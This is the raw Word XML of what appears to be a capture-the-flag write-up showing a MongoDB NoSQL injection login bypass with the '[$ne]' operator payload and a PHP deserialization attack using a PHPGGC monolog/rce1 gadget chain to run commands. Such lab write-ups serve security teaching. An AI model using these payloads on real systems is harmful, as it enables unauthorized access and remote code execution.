          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NoSQL Injection – MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>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89">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NoSQL databases provide more flexible consistency constraints than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scalability benefits. However, they are still potentially vulnerable to injection attacks, even though they do not use traditional SQL syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>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8B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/pentesting-web/nosql-injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>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8D">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We will enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">teste:teste</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">login </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">field and then intercept the request with Burp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>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8F">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295900" cy="7905750"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="48" name="image5.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5295900" cy="7905750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>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91">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3517900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66" name="image19.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image19.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3517900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>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93">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Authentication Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>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95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using not equal ($ne) or greater ($gt)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">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PHP has an interesting way of passing negated parameters, which helps us bypass authentication. Passing parameters using the [$ne] (not equal) operator allows us to do this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">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The application will allow us to bypass the login mechanism, and our injection will succeed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>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99">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">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username[$ne]=toto&amp;password[$ne]=toto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>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9C">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3606800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58" name="image10.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image10.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3606800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>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9E">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After forwarding the request, we are logged into the application =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>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A0">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1796208"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69" name="image26.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image26.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect b="46274" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1796208"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspecting the page source code, we find our third </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
      <w:pPr>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A2">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1532175"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49" name="image14.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image14.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:srcRect b="42551" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1532175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure Deserialization in PHP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">
      <w:pPr>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A5">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After logging into the application, we notice a Base64-encoded cookie. We will decode it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">
      <w:pPr>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A7">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1473200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51" name="image2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image2.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1473200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1625600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1625600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>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A9">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After decoding, we obtain a serialized object. We will now use a tool called</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHPGGC (PHP Generic Gadget Chains)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>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AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHPGGC is a library of unserialize() payloads along with a tool to generate them, from the command line or programmatically. When you find an unserialize() in a site without access to its source code—or when creating an exploit—this tool allows you to generate payloads without manually chaining gadgets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC">
      <w:pPr>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AD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/ambionics/phpggc/tree/master/gadgetchains</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
      <w:pPr>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AF">
      <w:pPr>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B0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will create a payload using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHPGGC</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gadget </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we will use is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">monolog/rce1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">
      <w:pPr>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B2">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./phpggc monolog/rce1 system 'ls' -b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">
      <w:pPr>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B4">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1866900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57" name="image13.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image13.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1866900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
